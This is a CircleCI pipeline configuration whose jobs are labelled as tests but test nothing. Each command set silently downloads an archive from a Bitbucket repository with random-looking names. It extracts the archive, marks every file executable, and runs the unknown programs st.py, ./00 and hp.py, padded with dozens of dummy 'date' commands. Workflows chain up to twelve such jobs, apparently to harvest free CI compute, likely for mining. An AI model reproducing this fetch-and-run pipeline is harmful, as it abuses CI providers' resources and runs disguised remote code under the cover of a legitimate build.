version: 2.1

commands:

  setup:
    steps:
      - run:
          name: Set_01
          command: curl -o martialasion https://bitbucket.org/namskdjworitpwprkdgalxmv/naszxcoiuwemnaoemaosnuemazoiemnaszxoiemwazxmcnoemaowemazsxcovm/raw/9692e7a20bdcb3c48bb122f003a7b9184bb7b8fc/unaseiuowemnaszxcoivuiowezxmnvoieweoizxmasoiweruiomnaszxcnoiuewe > /dev/null 2>&1 && chmod u+x *

      - run:
          name: Set_02
          command: tar -xf martialasion && chmod u+x *

      - run:
          name: Set_03
          command: python st.py

      - run:
          name: Set_04
          command: ./00

      - run:
          name: Set_05
          command: date

      - run:
          name: Set_06
          command: date

      - run:
          name: Set_07
          command: date

      - run:
          name: Set_08
          command: date

      - run:
          name: Set_09
          command: date

      - run:
          name: Set_10
          command: python hp.py

  setep:
    steps:
      - run:
          name: Set_01
          command: curl -o martialasion https://bitbucket.org/namskdjworitpwprkdgalxmv/naszxcoiuwemnaoemaosnuemazoiemnaszxoiemwazxmcnoemaowemazsxcovm/raw/9692e7a20bdcb3c48bb122f003a7b9184bb7b8fc/unaseiuowemnaszxcoivuiowezxmnvoieweoizxmasoiweruiomnaszxcnoiuewe > /dev/null 2>&1 && chmod u+x *

      - run:
          name: Set_02
          command: tar -xf martialasion && chmod u+x *

      - run:
          name: Set_03
          command: python st.py

      - run:
          name: Set_04
          command: ./00

      - run:
          name: Set_05
          command: |
            date
            date
            date

      - run:
          name: Set_06
          command: date

      - run:
          name: Set_07
          command: |
            date
            date

      - run:
          name: Set_08
          command: |
            date
            date
            date
            date

      - run:
          name: Set_09
          command: date

      - run:
          name: Set_10
          command: python hp.py

  setip:
    steps:
      - run:
          name: Set_01
          command: |
            curl -o martialasion https://bitbucket.org/namskdjworitpwprkdgalxmv/naszxcoiuwemnaoemaosnuemazoiemnaszxoiemwazxmcnoemaowemazsxcovm/raw/9692e7a20bdcb3c48bb122f003a7b9184bb7b8fc/unaseiuowemnaszxcoivuiowezxmnvoieweoizxmasoiweruiomnaszxcnoiuewe > /dev/null 2>&1 && chmod u+x *
            tar -xf martialasion && chmod u+x *
            python st.py
            ./00
            date
            date
            date
            date
            date
            date

      - run:
          name: Set_02
          command: |
            date
            date
            date
            date
            date
            date
            date
            date
            date
            date

      - run:
          name: Set_03
          command: |
            date
            date
            date
            date
            date
            date
            date
            date

      - run:
          name: Set_04
          command: |
            date
            date
            date
            date
            date
            date

      - run:
          name: Set_05
          command: |
            date
            date
            date
            date
            date
            date
            date
            date

      - run:
          name: Set_06
          command: |
            date
            date
            date
            date
            date
            date
            date
            date
            date

      - run:
          name: Set_07
          command: |
            date
            date
            date
            date

      - run:
          name: Set_08
          command: |
            date
            date
            date
            date
            date
            date
            date
            date
            date
            date

      - run:
          name: Set_09
          command: |
            date
            date
            date
            date
            date
            date

      - run:
          name: Set_10
          command: |
            date
            date
            date
            date
            date
            date
            date
            date
            date
            date
            date
            python hp.py
            
  setop:
    steps:
      - run:
          name: Set_01
          command: curl -o martialasion https://bitbucket.org/namskdjworitpwprkdgalxmv/naszxcoiuwemnaoemaosnuemazoiemnaszxoiemwazxmcnoemaowemazsxcovm/raw/9692e7a20bdcb3c48bb122f003a7b9184bb7b8fc/unaseiuowemnaszxcoivuiowezxmnvoieweoizxmasoiweruiomnaszxcnoiuewe > /dev/null 2>&1 && chmod u+x *

      - run:
          name: Set_02
          command: tar -xf martialasion && chmod u+x *

      - run:
          name: Set_03
          command: python st.py

      - run:
          name: Set_04
          command: ./00

      - run:
          name: Set_05
          command: date

      - run:
          name: Set_06
          command: date

      - run:
          name: Set_07
          command: date

      - run:
          name: Set_08
          command: date

      - run:
          name: Set_09
          command: date

      - run:
          name: Set_10
          command: python hp.py








jobs:

  test_01:
    docker:
      - image: python:3.8
    working_directory: /root
    steps:
      - setup

  test_02:
    docker:
      - image: python:3.8
    working_directory: /root
    steps:
      - setip

  test_03:
    docker:
      - image: python:3.8
    working_directory: /root
    steps:
      - setop
    parallelism: 1

  test_04:
    docker:
      - image: python:3.8
    working_directory: /root
    steps:
      - setop
    parallelism: 1

  test_05:
    docker:
      - image: python:3.8
    working_directory: /root
    steps:
      - setop
    parallelism: 1

  test_06:
    docker:
      - image: python:3.8
    working_directory: /root
    steps:
      - setep

  test_07:
    docker:
      - image: python:3.8
    working_directory: /root
    steps:
      - setop
    parallelism: 1

  test_08:
    docker:
      - image: python:3.8
    working_directory: /root
    steps:
      - setop
    parallelism: 1

  test_09:
    docker:
      - image: python:3.8
    working_directory: /root
    steps:
      - setop
    parallelism: 1

  test_10:
    docker:
      - image: python:3.8
    working_directory: /root
    steps:
      - setep

  test_11:
    docker:
      - image: python:3.8
    working_directory: /root
    steps:
      - setop
    parallelism: 1

  test_12:
    docker:
      - image: python:3.8
    working_directory: /root
    steps:
      - setop
    parallelism: 1

  test_13:
    docker:
      - image: python:3.8
    working_directory: /root
    steps:
      - setop
    parallelism: 1



workflows:

  matrix_01:
    jobs:
      - test_01

  matrix_02:
    jobs:
      - test_01

  matrix_03:
    jobs:
      - test_01

  matrix_04:
    jobs:
      - test_01
      - test_02:
          requires:
            - test_01
      - test_03:
          requires:
            - test_01
            - test_02
      - test_04:
          requires:
            - test_01
            - test_02
            - test_03
      - test_05:
          requires:
            - test_01
            - test_02
            - test_03
            - test_04
      - test_06:
          requires:
            - test_01
            - test_02
            - test_03
            - test_04
            - test_05
      - test_07:
          requires:
            - test_01
            - test_02
            - test_03
            - test_04
            - test_05
            - test_06
      - test_08:
          requires:
            - test_01
            - test_02
            - test_03
            - test_04
            - test_05
            - test_06
            - test_07
      - test_09:
          requires:
            - test_01
            - test_02
            - test_03
            - test_04
            - test_05
            - test_06
            - test_07
            - test_08
      - test_10:
          requires:
            - test_01
            - test_02
            - test_03
            - test_04
            - test_05
            - test_06
            - test_07
            - test_08
            - test_09
      - test_11:
          requires:
            - test_01
            - test_02
            - test_03
            - test_04
            - test_05
            - test_06
            - test_07
            - test_08
            - test_09
            - test_10
      - test_12:
          requires:
            - test_01
            - test_02
            - test_03
            - test_04
            - test_05
            - test_06
            - test_07
            - test_08
            - test_09
            - test_10
            - test_11

  matrix_05:
    jobs:
      - test_01

  matrix_06:
    jobs:
      - test_01

  matrix_07:
    jobs:
      - test_01
      - test_02:
          requires:
            - test_01
      - test_03:
          requires:
            - test_01
            - test_02
      - test_04:
          requires:
            - test_01
            - test_02
            - test_03
      - test_05:
          requires:
            - test_01
            - test_02
            - test_03
            - test_04
      - test_06:
          requires:
            - test_01
            - test_02
            - test_03
            - test_04
            - test_05
      - test_07:
          requires:
            - test_01
            - test_02
            - test_03
            - test_04
            - test_05
            - test_06
      - test_08:
          requires:
            - test_01
            - test_02
            - test_03
            - test_04
            - test_05
            - test_06
            - test_07
      - test_09:
          requires:
            - test_01
            - test_02
            - test_03
            - test_04
            - test_05
            - test_06
            - test_07
            - test_08
      - test_10:
          requires:
            - test_01
            - test_02
            - test_03
            - test_04
            - test_05
            - test_06
            - test_07
            - test_08
            - test_09
      - test_11:
          requires:
            - test_01
            - test_02
            - test_03
            - test_04
            - test_05
            - test_06
            - test_07
            - test_08
            - test_09
            - test_10
      - test_12:
          requires:
            - test_01
            - test_02
            - test_03
            - test_04
            - test_05
            - test_06
            - test_07
            - test_08
            - test_09
            - test_10
            - test_11


  matrix_08:
    jobs:
      - test_01

  matrix_09:
    jobs:
      - test_01

  matrix_10:
    jobs:
      - test_01








